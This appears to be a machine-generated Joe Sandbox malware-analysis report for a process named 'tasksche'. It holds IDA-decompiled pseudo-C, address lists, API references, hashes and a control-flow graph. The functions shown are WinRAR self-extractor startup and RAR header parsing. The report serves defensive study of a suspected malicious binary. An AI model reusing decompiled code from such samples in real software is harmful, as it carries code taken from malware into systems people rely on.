                                                                                              				if( *0x441858 > 0) {
                                                                                              					_push( *0x44184c);
                                                                                              					E0041A506(0, _t94, 0x439820, _t113);
                                                                                              				}
                                                                                              				DeleteObject( *0x43981c);
                                                                                              				_t57 =  *0x439818;
                                                                                              				if(_t57 != 0) {
                                                                                              					DeleteObject(_t57);
                                                                                              				}
                                                                                              				_t115 =  *0x4335ac; // 0x3
                                                                                              				if(_t115 == 0 &&  *0x44183c != 0) {
                                                                                              					E004062BA(0x4335ac, 0xff);
                                                                                              				}
                                                                                              				_t58 =  *0x441868;
                                                                                              				 *0x44183c = 1;
                                                                                              				if( *0x441868 != 0) {
                                                                                              					E0040D857(_t58);
                                                                                              					CloseHandle( *0x441868);
                                                                                              				}
                                                                                              				_t59 =  *0x441864;
                                                                                              				if(_t59 != 0) {
                                                                                              					Sleep(_t59);
                                                                                              				}
                                                                                              				__imp__OleUninitialize();
                                                                                              				_t60 =  *0x441860;
                                                                                              				if(_t60 > 0) {
                                                                                              					return _t60;
                                                                                              				} else {
                                                                                              					_t61 =  *0x4335ac; // 0x3
                                                                                              					return _t61;
                                                                                              				}
                                                                                              			}

































                                                                                              0x0040fef0
                                                                                              0x0040fefe
                                                                                              0x0040ff06
                                                                                              0x0040ff11
                                                                                              0x0040ff22
                                                                                              0x0040ff27
                                                                                              0x0040ff30
                                                                                              0x0040ff32
                                                                                              0x0040ff34
                                                                                              0x0040ff37
                                                                                              0x0040ff42
                                                                                              0x0040ff9d
                                                                                              0x0040ff44
                                                                                              0x0040ff50
                                                                                              0x0040ff56
                                                                                              0x0040ff5b
                                                                                              0x0040ff68
                                                                                              0x0040ff6a
                                                                                              0x0040ff6c
                                                                                              0x0040ff75
                                                                                              0x0040ff7a
                                                                                              0x0040ff82
                                                                                              0x0040ff85
                                                                                              0x0040ff85
                                                                                              0x0040ff8b
                                                                                              0x0040ff8b
                                                                                              0x0040ff94
                                                                                              0x0040ff94
                                                                                              0x0040ff42
                                                                                              0x0040ffae
                                                                                              0x0040ffc0
                                                                                              0x0040ffc6
                                                                                              0x0040ffd0
                                                                                              0x0040ffd5
                                                                                              0x0040ffda
                                                                                              0x0040ffdf
                                                                                              0x0040ffe4
                                                                                              0x0040ffe9
                                                                                              0x0040fffd
                                                                                              0x00410011
                                                                                              0x0041001a
                                                                                              0x0041001f
                                                                                              0x00410025
                                                                                              0x0041002b
                                                                                              0x00410039
                                                                                              0x0041003e
                                                                                              0x00410047
                                                                                              0x0041004c
                                                                                              0x00410057
                                                                                              0x0041005f
                                                                                              0x00410067
                                                                                              0x00410075
                                                                                              0x00410083
                                                                                              0x0041008a
                                                                                              0x00410098
                                                                                              0x0041009d
                                                                                              0x004100a6
                                                                                              0x004100ac
                                                                                              0x004100b2
                                                                                              0x004100ba
                                                                                              0x004100c2
                                                                                              0x004100cd
                                                                                              0x004100cf
                                                                                              0x004100cf
                                                                                              0x004100d9
                                                                                              0x004100de
                                                                                              0x004100e4
                                                                                              0x004100e6
                                                                                              0x004100ec
                                                                                              0x004100f1
                                                                                              0x004100fe
                                                                                              0x00410100
                                                                                              0x00410107
                                                                                              0x0041010a
                                                                                              0x0041010a
                                                                                              0x0041010c
                                                                                              0x00410112
                                                                                              0x00410126
                                                                                              0x00410126
                                                                                              0x0041012b
                                                                                              0x00410130
                                                                                              0x00410139
                                                                                              0x0041013c
                                                                                              0x00410147
                                                                                              0x00410147
                                                                                              0x0041014d
                                                                                              0x00410154
                                                                                              0x00410157
                                                                                              0x00410157
                                                                                              0x0041015d
                                                                                              0x00410163
                                                                                              0x0041016d
                                                                                              0x00410175
                                                                                              0x0041016f
                                                                                              0x0041016f
                                                                                              0x00000000
                                                                                              0x0041016f

                                                                                              APIs
                                                                                                • Part of subcall function 00410E1C: GetModuleHandleW.KERNEL32(kernel32,0040FF03,00000001), ref: 00410E21
                                                                                                • Part of subcall function 00410E1C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410E31
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040FF06
                                                                                                • Part of subcall function 00411F56: GetCPInfo.KERNEL32(00000000,?,?,?,?,0040FF16), ref: 00411F67
                                                                                                • Part of subcall function 00411F56: IsDBCSLeadByte.KERNEL32(00000000), ref: 00411F7B
                                                                                              • _memset.LIBCMT ref: 0040FF22
                                                                                              • GetCommandLineW.KERNEL32 ref: 0040FF2A
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0040FF50
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007002), ref: 0040FF62
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040FF8B
                                                                                                • Part of subcall function 0040D5F7: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D610
                                                                                                • Part of subcall function 0040D5F7: SetEnvironmentVariableW.KERNELBASE(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D643
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040FF94
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00439820,00000800), ref: 0040FFAE
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxname,00439820), ref: 0040FFC0
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0040FFC6
                                                                                              • _swprintf.LIBCMT ref: 0040FFFD
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00410011
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410014
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 0041002B
                                                                                              • LoadBitmapW.USER32(00000065), ref: 0041003E
                                                                                              • DialogBoxParamW.USER32 ref: 0041009D
                                                                                              • DeleteObject.GDI32 ref: 004100FE
                                                                                              • DeleteObject.GDI32(?), ref: 0041010A
                                                                                                • Part of subcall function 0040D64B: CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D6AC
                                                                                                • Part of subcall function 0040D64B: CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D6D3
                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00410147
                                                                                              • Sleep.KERNEL32(?), ref: 00410157
                                                                                              • OleUninitialize.OLE32 ref: 0041015D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$CharCloseDeleteLoadObjectUpperView$AddressBitmapByteCommandDialogIconInfoInitializeLeadLineLocalMappingNameOpenParamProcSleepTimeUninitializeUnmap_memset_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 2890863147-3710569615
                                                                                              • Opcode ID: 80a7e11a645b2e2d2aca1507ec210b481b2238b003543a9d3cc58b98ec170c2c
                                                                                              • Instruction ID: f6d524faf13461bd4ea8cb5a97d50562f0dad5b6822c88fd20d602f5543b7383
                                                                                              • Opcode Fuzzy Hash: 80a7e11a645b2e2d2aca1507ec210b481b2238b003543a9d3cc58b98ec170c2c
                                                                                              • Instruction Fuzzy Hash: 5061D971A00205BFC720BFA1DC499AE7BB8EB05314F50443BF901A22A1DB7D4D95DB6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 611 402f2c-402f5e call 41a4dc call 41aaf0 call 40b736 618 402f60-402f75 611->618 619 402faf-402fb3 611->619 618->619 620 402f77 618->620 621 40302f-403034 call 40b4c8 619->621 622 402f83-402f9e call 401bbb 620->622 623 402f79-402f81 620->623 626 403039-40303c 621->626 628 402fa0-402fa2 call 401c37 622->628 636 402fb5-402fee call 405fe7 622->636 623->619 623->622 626->628 629 403042-403071 call 40b5af call 40b670 call 40b60d 626->629 634 402fa7-402faa 628->634 651 403675-403677 call 401c80 629->651 652 403077-403079 629->652 637 403680 634->637 646 402ff0-403007 call 41ac04 636->646 647 40302c 636->647 640 403682-40368a call 41a506 637->640 641 40368b 637->641 640->641 645 40368d-40369e 641->645 646->647 656 403009-403027 call 406376 call 4062ba 646->656 647->621 657 40367c 651->657 652->651 655 40307f-403089 652->655 655->651 658 40308f-403092 655->658 656->634 657->637 658->651 660 403098-4030a4 call 40b4c8 658->660 666 4030b2-403103 call 40b716 call 40b60d * 2 660->666 667 4030a6-4030ad call 401c37 660->667 676 403105-403123 call 401c80 call 4062ba 666->676 677 40313d-40314c 666->677 667->657 676->677 695 403125-403138 call 40639f 676->695 679 40317b-403188 677->679 680 40314e-403166 call 40b60d 677->680 682 403198-4031ce call 4010d4 679->682 683 40318a-403195 call 40b60d 679->683 680->679 689 403168 680->689 696 4031d4 682->696 697 40358d-4035ec call 409b19 call 40b60d 682->697 683->682 693 40316a-40316d 689->693 694 40316f-403176 call 401c80 689->694 693->679 693->694 694->634 695->657 701 403641-40364d 696->701 702 4031da-4031dd 696->702 723 4035fe 697->723 724 4035ee-4035fc call 40b60d 697->724 705 40365f-403666 701->705 706 40364f 701->706 708 4031e3-4031e6 702->708 709 4032f7-403300 702->709 710 403671-403673 705->710 711 403668-403670 call 41a506 705->711 706->651 716 403651-40365d 706->716 712 403225-40323a call 40b60d 708->712 713 4031e8-4031eb 708->713 714 403302 709->714 715 403308-403375 call 409b44 call 40b60d * 2 709->715 710->645 711->710 733 40324c-403270 call 40b60d call 40b562 712->733 734 40323c-403247 call 401ca3 712->734 713->701 720 4031f1-403220 call 40b60d 713->720 714->715 749 403377-403382 715->749 750 403388-4033a2 715->750 716->651 716->705 720->701 731 403605-40360c 723->731 724->731 736 40361c 731->736 737 40360e-403615 731->737 733->734 755 403272-40328a call 40b696 733->755 734->657 743 40361e-40362a 736->743 737->736 741 403617-40361a 737->741 741->743 743->701 747 40362c-40363c call 40272e 743->747 747->701 749->750 753 4033a4 750->753 754 4033aa-4033ac 750->754 757 4033a6-4033a8 753->757 758 4033ae-4033cc call 40b60d 753->758 754->758 762 4032eb-4032f2 755->762 763 40328c-4032e5 call 40b696 * 2 call 4106ae call 4109b0 call 410a29 call 41ac04 755->763 757->754 757->758 764 4033e4-4033f4 758->764 765 4033ce-4033df call 40b5af call 411357 758->765 762->701 763->762 769 4033f6-403404 call 40b5af 764->769 770 40340a-403464 call 40b60d * 3 764->770 765->764 769->770 787 403466-40346c 770->787 788 40346e-403470 770->788 790 403475-4034a2 787->790 788->790 791 403472 788->791 793 4034a4-4034a8 790->793 794 4034af 790->794 791->790 793->794 796 4034aa-4034ad 793->796 797 4034b1-403502 794->797 796->797 799 403504 797->799 800 403506-403539 call 40b696 call 411cd1 797->800 799->800 805 40354a-40354e 800->805 806 40353b-403545 call 40272e 800->806 807 403550-403558 call 401a7e 805->807 808 40355a-403569 call 41aa21 805->808 806->805 814 403572-403576 807->814 808->814 815 40356b 808->815 814->701 816 40357c-403588 call 40639f 814->816 815->814 816->701
                                                                                              C-Code - Quality: 94%
                                                                                              			E00402F2C(intOrPtr* __ecx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				void* _t223;
                                                                                              				intOrPtr _t225;
                                                                                              				signed int _t229;
                                                                                              				void* _t231;
                                                                                              				void* _t232;
                                                                                              				unsigned int _t235;
                                                                                              				void* _t240;
                                                                                              				intOrPtr _t243;
                                                                                              				signed char _t246;
                                                                                              				char _t247;
                                                                                              				void* _t258;
                                                                                              				void* _t261;
                                                                                              				signed int _t267;
                                                                                              				signed int _t268;
                                                                                              				intOrPtr _t269;
                                                                                              				signed int* _t270;
                                                                                              				signed char _t271;
                                                                                              				void* _t274;
                                                                                              				signed int _t295;
                                                                                              				signed int _t306;
                                                                                              				signed int _t310;
                                                                                              				signed int _t327;
                                                                                              				signed char _t329;
                                                                                              				signed int _t335;
                                                                                              				void* _t343;
                                                                                              				void* _t346;
                                                                                              				signed int _t355;
                                                                                              				intOrPtr* _t360;
                                                                                              				signed int _t374;
                                                                                              				signed int _t382;
                                                                                              				signed int _t400;
                                                                                              				signed int _t404;
                                                                                              				signed int* _t412;
                                                                                              				unsigned int _t413;
                                                                                              				char _t416;
                                                                                              				void* _t434;
                                                                                              				void* _t443;
                                                                                              				signed int _t460;
                                                                                              				void* _t461;
                                                                                              				signed int _t462;
                                                                                              				signed char _t464;
                                                                                              				void* _t468;
                                                                                              				void* _t470;
                                                                                              				void* _t473;
                                                                                              				void* _t474;
                                                                                              				intOrPtr _t481;
                                                                                              				void* _t482;
                                                                                              				void* _t484;
                                                                                              				void* _t485;
                                                                                              				signed int _t494;
                                                                                              				void* _t497;
                                                                                              
                                                                                              				_t485 = _t484 - 0x50;
                                                                                              				E0041A4DC(E00429589, _t482);
                                                                                              				E0041AAF0(0x2070);
                                                                                              				_push(_t479);
                                                                                              				_t360 = __ecx;
                                                                                              				E0040B736(_t482 + 0x28, __ecx);
                                                                                              				_t466 = 0;
                                                                                              				 *((intOrPtr*)(_t482 - 4)) = 0;
                                                                                              				if( *((char*)(__ecx + 0xb05c)) == 0) {
                                                                                              					L7:
                                                                                              					 *((char*)(_t482 + 0x53)) = 0;
                                                                                              					L12:
                                                                                              					_t223 = E0040B4C8(_t482 + 0x28, _t466, 7); // executed
                                                                                              					__eflags = _t223 - 7;
                                                                                              					if(__eflags < 0) {
                                                                                              						L5:
                                                                                              						E00401C37(_t360, _t460, _t496);
                                                                                              						L6:
                                                                                              						_t497 =  *(_t482 + 0x28) - _t466;
                                                                                              						L88:
                                                                                              						if(_t497 != 0) {
                                                                                              							_push( *(_t482 + 0x28));
                                                                                              							E0041A506(_t360, _t466, _t479, _t497);
                                                                                              						}
                                                                                              						_t225 = 0;
                                                                                              						L91:
                                                                                              						 *[fs:0x0] =  *((intOrPtr*)(_t482 - 0xc));
                                                                                              						return _t225;
                                                                                              					}
                                                                                              					 *(_t360 + 0x655c) = 0;
                                                                                              					_t479 = _t360 + 0x654c;
                                                                                              					 *_t479 = E0040B5AF(_t482 + 0x28);
                                                                                              					_t466 = E0040B670(_t482 + 0x28, 4);
                                                                                              					_t229 = E0040B60D(_t460);
                                                                                              					__eflags = _t229 | _t460;
                                                                                              					if((_t229 | _t460) == 0) {
                                                                                              						L86:
                                                                                              						E00401C80(_t360);
                                                                                              						L87:
                                                                                              						__eflags =  *(_t482 + 0x28);
                                                                                              						goto L88;
                                                                                              					}
                                                                                              					__eflags = _t466;
                                                                                              					if(_t466 == 0) {
                                                                                              						goto L86;
                                                                                              					}
                                                                                              					_t231 = _t229 + _t466;
                                                                                              					_t30 = _t231 - 3; // -3
                                                                                              					_t374 = _t30;
                                                                                              					_t31 = _t231 + 4; // 0x4
                                                                                              					_t466 = _t31;
                                                                                              					__eflags = _t374;
                                                                                              					if(_t374 < 0) {
                                                                                              						goto L86;
                                                                                              					}
                                                                                              					__eflags = _t466 - 7;
                                                                                              					if(_t466 < 7) {
                                                                                              						goto L86;
                                                                                              					}
                                                                                              					_t232 = E0040B4C8(_t482 + 0x28, _t466, _t374);
                                                                                              					__eflags =  *((intOrPtr*)(_t482 + 0x3c)) - _t466;
                                                                                              					if(__eflags >= 0) {
                                                                                              						 *(_t482 + 0x4c) = E0040B716(_t232, _t482 + 0x28);
                                                                                              						 *((intOrPtr*)(_t360 + 0x6550)) = E0040B60D(_t460);
                                                                                              						_t235 = E0040B60D(_t460);
                                                                                              						 *(_t360 + 0x6554) = _t235;
                                                                                              						 *(_t360 + 0x655c) = _t235 >> 0x00000002 & 0x00000001;
                                                                                              						 *((intOrPtr*)(_t360 + 0x6544)) =  *((intOrPtr*)(_t360 + 0x6550));
                                                                                              						__eflags =  *_t479 -  *(_t482 + 0x4c);
                                                                                              						 *(_t360 + 0x6558) = _t466;
                                                                                              						 *((char*)(_t482 + 0x4b)) =  *_t479 !=  *(_t482 + 0x4c);
                                                                                              						__eflags =  *((char*)(_t482 + 0x4b));
                                                                                              						if( *((char*)(_t482 + 0x4b)) == 0) {
                                                                                              							L22:
                                                                                              							_t466 = 0;
                                                                                              							__eflags =  *(_t360 + 0x6554) & 0x00000001;
                                                                                              							 *(_t482 + 0x18) = 0;
                                                                                              							 *(_t482 + 0x1c) = 0;
                                                                                              							if(( *(_t360 + 0x6554) & 0x00000001) == 0) {
                                                                                              								L27:
                                                                                              								__eflags =  *(_t360 + 0x6554) & 0x00000002;
                                                                                              								 *(_t482 + 0x20) = _t466;
                                                                                              								 *(_t482 + 0x24) = _t466;
                                                                                              								if(( *(_t360 + 0x6554) & 0x00000002) != 0) {
                                                                                              									 *(_t482 + 0x20) = E0040B60D(_t460);
                                                                                              									 *(_t482 + 0x24) = _t460;
                                                                                              								}
                                                                                              								_t240 = E004010D4(_t360,  *(_t360 + 0x6558));
                                                                                              								asm("adc ecx, [ebx+0xb044]");
                                                                                              								asm("adc ecx, [ebp+0x24]");
                                                                                              								 *((intOrPtr*)(_t360 + 0xb048)) = _t240 +  *((intOrPtr*)(_t360 + 0xb040)) +  *(_t482 + 0x20);
                                                                                              								_t243 =  *((intOrPtr*)(_t360 + 0x6550));
                                                                                              								 *((intOrPtr*)(_t360 + 0xb04c)) = 0;
                                                                                              								__eflags = _t243 - 1;
                                                                                              								if(__eflags == 0) {
                                                                                              									_t468 = _t360 + 0x6570;
                                                                                              									E00409B19(_t468);
                                                                                              									_t382 = 5;
                                                                                              									memcpy(_t468, _t479, _t382 << 2);
                                                                                              									_t466 = _t479 + _t382 + _t382;
                                                                                              									_t246 = E0040B60D(_t460);
                                                                                              									 *(_t360 + 0xb055) = _t246 & 0x00000001;
                                                                                              									 *(_t360 + 0xb054) = _t246 >> 0x00000002 & 0x00000001;
                                                                                              									 *(_t360 + 0xb057) = _t246 >> 0x00000004 & 0x00000001;
                                                                                              									 *(_t360 + 0xb05b) = _t246 >> 0x00000003 & 0x00000001;
                                                                                              									 *((char*)(_t360 + 0xb058)) = 0;
                                                                                              									 *((char*)(_t360 + 0xb05a)) = 1;
                                                                                              									__eflags = _t246 & 0x00000002;
                                                                                              									if((_t246 & 0x00000002) == 0) {
                                                                                              										_t198 = _t360 + 0xb078;
                                                                                              										 *_t198 =  *(_t360 + 0xb078) & 0x00000000;
                                                                                              										__eflags =  *_t198;
                                                                                              									} else {
                                                                                              										 *(_t360 + 0xb078) = E0040B60D(_t460);
                                                                                              									}
                                                                                              									__eflags =  *(_t360 + 0xb055);
                                                                                              									if( *(_t360 + 0xb055) == 0) {
                                                                                              										L77:
                                                                                              										_t247 = 0;
                                                                                              										__eflags = 0;
                                                                                              										goto L78;
                                                                                              									} else {
                                                                                              										__eflags =  *(_t360 + 0xb078);
                                                                                              										if( *(_t360 + 0xb078) != 0) {
                                                                                              											goto L77;
                                                                                              										}
                                                                                              										_t247 = 1;
                                                                                              										L78:
                                                                                              										 *((char*)(_t360 + 0xb059)) = _t247;
                                                                                              										__eflags =  *(_t482 + 0x18) |  *(_t482 + 0x1c);
                                                                                              										if(( *(_t482 + 0x18) |  *(_t482 + 0x1c)) != 0) {
                                                                                              											_push(_t360 + 0x6570);
                                                                                              											_push( *(_t482 + 0x18));
                                                                                              											_push(_t482 + 0x28);
                                                                                              											E0040272E(_t360, _t460);
                                                                                              										}
                                                                                              										L80:
                                                                                              										__eflags =  *((intOrPtr*)(_t360 + 0xb04c)) -  *((intOrPtr*)(_t360 + 0xb044));
                                                                                              										if(__eflags > 0) {
                                                                                              											L83:
                                                                                              											__eflags =  *(_t482 + 0x28);
                                                                                              											_t481 =  *((intOrPtr*)(_t482 + 0x3c));
                                                                                              											if(__eflags != 0) {
                                                                                              												_push( *(_t482 + 0x28));
                                                                                              												E0041A506(_t360, _t466, _t481, __eflags);
                                                                                              											}
                                                                                              											_t225 = _t481;
                                                                                              											goto L91;
                                                                                              										}
                                                                                              										if(__eflags < 0) {
                                                                                              											goto L86;
                                                                                              										}
                                                                                              										__eflags =  *((intOrPtr*)(_t360 + 0xb048)) -  *((intOrPtr*)(_t360 + 0xb040));
                                                                                              										if( *((intOrPtr*)(_t360 + 0xb048)) <=  *((intOrPtr*)(_t360 + 0xb040))) {
                                                                                              											goto L86;
                                                                                              										}
                                                                                              										goto L83;
                                                                                              									}
                                                                                              								}
                                                                                              								if(__eflags <= 0) {
                                                                                              									goto L80;
                                                                                              								}
                                                                                              								__eflags = _t243 - 3;
                                                                                              								if(_t243 <= 3) {
                                                                                              									__eflags = _t243 - 2;
                                                                                              									_t258 = _t360 + 0x65e8;
                                                                                              									if(_t243 != 2) {
                                                                                              										_t258 = _t360 + 0x8928;
                                                                                              									}
                                                                                              									_t470 = _t258;
                                                                                              									 *(_t482 + 0x4c) = _t258;
                                                                                              									E00409B44(_t470, 0);
                                                                                              									_t400 = 5;
                                                                                              									_t261 = memcpy(_t470, _t479, _t400 << 2);
                                                                                              									__eflags =  *((intOrPtr*)(_t360 + 0x6550)) - 2;
                                                                                              									_t479 =  *(_t482 + 0x4c);
                                                                                              									 *(_t479 + 0x1048) = _t261;
                                                                                              									 *((char*)(_t482 + 0x53)) =  *((intOrPtr*)(_t360 + 0x6550)) == 2;
                                                                                              									 *((char*)(_t479 + 0x10e9)) = 1;
                                                                                              									 *(_t479 + 0x104c) =  *(_t482 + 0x24);
                                                                                              									 *(_t479 + 0x1084) = E0040B60D(_t460);
                                                                                              									 *(_t479 + 0x1050) = E0040B60D(_t460);
                                                                                              									_t267 =  *(_t479 + 0x1084) >> 0x00000003 & 0x00000001;
                                                                                              									__eflags = _t267;
                                                                                              									 *(_t479 + 0x1054) = _t460;
                                                                                              									 *(_t479 + 0x108a) = _t267;
                                                                                              									if(_t267 != 0) {
                                                                                              										 *(_t479 + 0x1050) = 0x7fffffff;
                                                                                              										 *(_t479 + 0x1054) = 0x7fffffff;
                                                                                              									}
                                                                                              									_t268 =  *(_t479 + 0x104c);
                                                                                              									_t404 =  *(_t479 + 0x1054);
                                                                                              									__eflags = _t268 - _t404;
                                                                                              									_t461 =  *(_t479 + 0x1048);
                                                                                              									_t473 =  *(_t479 + 0x1050);
                                                                                              									if(__eflags < 0) {
                                                                                              										L48:
                                                                                              										_t461 = _t473;
                                                                                              										_t268 = _t404;
                                                                                              										goto L49;
                                                                                              									} else {
                                                                                              										if(__eflags > 0) {
                                                                                              											L49:
                                                                                              											 *(_t479 + 0x1058) = _t461;
                                                                                              											 *(_t479 + 0x105c) = _t268;
                                                                                              											_t269 = E0040B60D(_t461);
                                                                                              											__eflags =  *(_t479 + 0x1084) & 0x00000002;
                                                                                              											 *((intOrPtr*)(_t479 + 0x1c)) = _t269;
                                                                                              											if(( *(_t479 + 0x1084) & 0x00000002) != 0) {
                                                                                              												E00411357(_t479 + 0x1030, _t461, E0040B5AF(_t482 + 0x28), 0);
                                                                                              											}
                                                                                              											_t270 = _t479 + 0x1060;
                                                                                              											 *_t270 =  *_t270 & 0x00000000;
                                                                                              											__eflags =  *(_t479 + 0x1084) & 0x00000004;
                                                                                              											if(( *(_t479 + 0x1084) & 0x00000004) != 0) {
                                                                                              												 *_t270 = 2;
                                                                                              												 *((intOrPtr*)(_t479 + 0x1064)) = E0040B5AF(_t482 + 0x28);
                                                                                              											}
                                                                                              											 *(_t479 + 0x10f0) =  *(_t479 + 0x10f0) & 0x00000000;
                                                                                              											_t271 = E0040B60D(_t461);
                                                                                              											 *(_t482 + 0x4c) = _t271;
                                                                                              											 *(_t479 + 0x1a) = _t271 >> 0x00000007 & 0x00000007;
                                                                                              											 *(_t479 + 0x19) = _t271 & 0x0000003f;
                                                                                              											 *((char*)(_t479 + 0x18)) = E0040B60D(_t461);
                                                                                              											_t274 = E0040B60D(_t461);
                                                                                              											_t462 =  *((intOrPtr*)(_t479 + 0x18));
                                                                                              											_t474 = _t274;
                                                                                              											_t412 = _t479 + 0x10ec;
                                                                                              											 *(_t479 + 0x10e8) =  *(_t360 + 0x6554) >> 0x00000006 & 0x00000001;
                                                                                              											 *_t412 = 2;
                                                                                              											__eflags = _t462 - 1;
                                                                                              											if(_t462 != 1) {
                                                                                              												__eflags = _t462;
                                                                                              												if(_t462 == 0) {
                                                                                              													 *_t412 =  *_t412 & 0x00000000;
                                                                                              													__eflags =  *_t412;
                                                                                              												}
                                                                                              											} else {
                                                                                              												 *_t412 = 1;
                                                                                              											}
                                                                                              											_t413 =  *(_t479 + 8);
                                                                                              											 *(_t479 + 0x1088) = _t413 >> 0x00000003 & 0x00000001;
                                                                                              											__eflags =  *((char*)(_t482 + 0x53));
                                                                                              											 *(_t479 + 0x1089) = _t413 >> 0x00000004 & 0x00000001;
                                                                                              											 *(_t479 + 0x10ea) = _t413 >> 0x00000005 & 0x00000001;
                                                                                              											if( *((char*)(_t482 + 0x53)) == 0) {
                                                                                              												L60:
                                                                                              												_t416 = 0;
                                                                                              												__eflags = 0;
                                                                                              												goto L61;
                                                                                              											} else {
                                                                                              												__eflags =  *(_t482 + 0x4c) & 0x00000040;
                                                                                              												if(( *(_t482 + 0x4c) & 0x00000040) == 0) {
                                                                                              													goto L60;
                                                                                              												}
                                                                                              												_t416 = 1;
                                                                                              												L61:
                                                                                              												 *((char*)(_t479 + 0x10e0)) = _t416;
                                                                                              												_t464 =  *(_t479 + 0x1084) & 0x00000001;
                                                                                              												asm("sbb ecx, ecx");
                                                                                              												asm("sbb eax, eax");
                                                                                              												 *(_t479 + 0x10e4) =  !( ~(_t464 & 0x000000ff)) & 0x00020000 << ( *(_t482 + 0x4c) >> 0x0000000a & 0x0000000f);
                                                                                              												 *(_t479 + 0x10e1) = _t464;
                                                                                              												 *(_t479 + 0x108c) =  ~( *(_t479 + 0x108b) & 0x000000ff) & 0x00000005;
                                                                                              												__eflags = _t474 - 0x1fff;
                                                                                              												if(_t474 >= 0x1fff) {
                                                                                              													_t474 = 0x1fff;
                                                                                              												}
                                                                                              												E0040B696(_t482 + 0x28, _t482 - 0x207c, _t474);
                                                                                              												 *((char*)(_t482 + _t474 - 0x207c)) = 0;
                                                                                              												_t466 = _t479 + 0x20;
                                                                                              												E00411CD1(_t482 + 0x28, _t482 - 0x207c, _t479 + 0x20, 0x800);
                                                                                              												__eflags =  *(_t482 + 0x18) |  *(_t482 + 0x1c);
                                                                                              												if(( *(_t482 + 0x18) |  *(_t482 + 0x1c)) != 0) {
                                                                                              													_push(_t479);
                                                                                              													_push( *(_t482 + 0x18));
                                                                                              													_push(_t482 + 0x28);
                                                                                              													E0040272E(_t360, _t464);
                                                                                              												}
                                                                                              												__eflags =  *((char*)(_t482 + 0x53));
                                                                                              												if( *((char*)(_t482 + 0x53)) == 0) {
                                                                                              													_t295 = E0041AA21(_t466, "CMT");
                                                                                              													__eflags = _t295;
                                                                                              													if(_t295 == 0) {
                                                                                              														 *((char*)(_t360 + 0xb056)) = 1;
                                                                                              													}
                                                                                              												} else {
                                                                                              													E00401A7E(_t360, _t479);
                                                                                              												}
                                                                                              												__eflags =  *((char*)(_t482 + 0x4b));
                                                                                              												if( *((char*)(_t482 + 0x4b)) != 0) {
                                                                                              													E0040639F(0x1a, _t360 + 0x1e, _t466);
                                                                                              												}
                                                                                              												goto L80;
                                                                                              											}
                                                                                              										}
                                                                                              										__eflags = _t461 - _t473;
                                                                                              										if(_t461 > _t473) {
                                                                                              											goto L49;
                                                                                              										}
                                                                                              										goto L48;
                                                                                              									}
                                                                                              								}
                                                                                              								__eflags = _t243 - 4;
                                                                                              								if(_t243 == 4) {
                                                                                              									_t434 = 5;
                                                                                              									memcpy(_t360 + 0x65b0, _t479, 0 << 2);
                                                                                              									_t466 = _t479 + _t434 + _t434;
                                                                                              									_t306 = E0040B60D(_t460);
                                                                                              									__eflags = _t306;
                                                                                              									if(_t306 <= 0) {
                                                                                              										 *(_t360 + 0x65c4) = E0040B60D(_t460) & 0x00000001;
                                                                                              										_t310 = E0040B562(_t482 + 0x28) & 0x000000ff;
                                                                                              										 *(_t360 + 0x65c8) = _t310;
                                                                                              										__eflags = _t310 - 0x18;
                                                                                              										if(_t310 > 0x18) {
                                                                                              											goto L36;
                                                                                              										}
                                                                                              										E0040B696(_t482 + 0x28, _t360 + 0x65cc, 0x10);
                                                                                              										__eflags =  *(_t360 + 0x65c4);
                                                                                              										if( *(_t360 + 0x65c4) != 0) {
                                                                                              											_t479 = _t360 + 0x65dc;
                                                                                              											E0040B696(_t482 + 0x28, _t360 + 0x65dc, 8);
                                                                                              											E0040B696(_t482 + 0x28, _t482 + 0x4c, 4);
                                                                                              											E004106AE(_t482 - 0x7c);
                                                                                              											E004109B0(_t482 - 0x7c, _t360 + 0x65dc, 8);
                                                                                              											E00410A29(_t482 + 0x28, _t460, __eflags, _t482 - 0x7c, _t482);
                                                                                              											_t327 = E0041AC04(_t482 + 0x4c, _t482, 4);
                                                                                              											asm("sbb al, al");
                                                                                              											_t329 =  ~_t327 + 1;
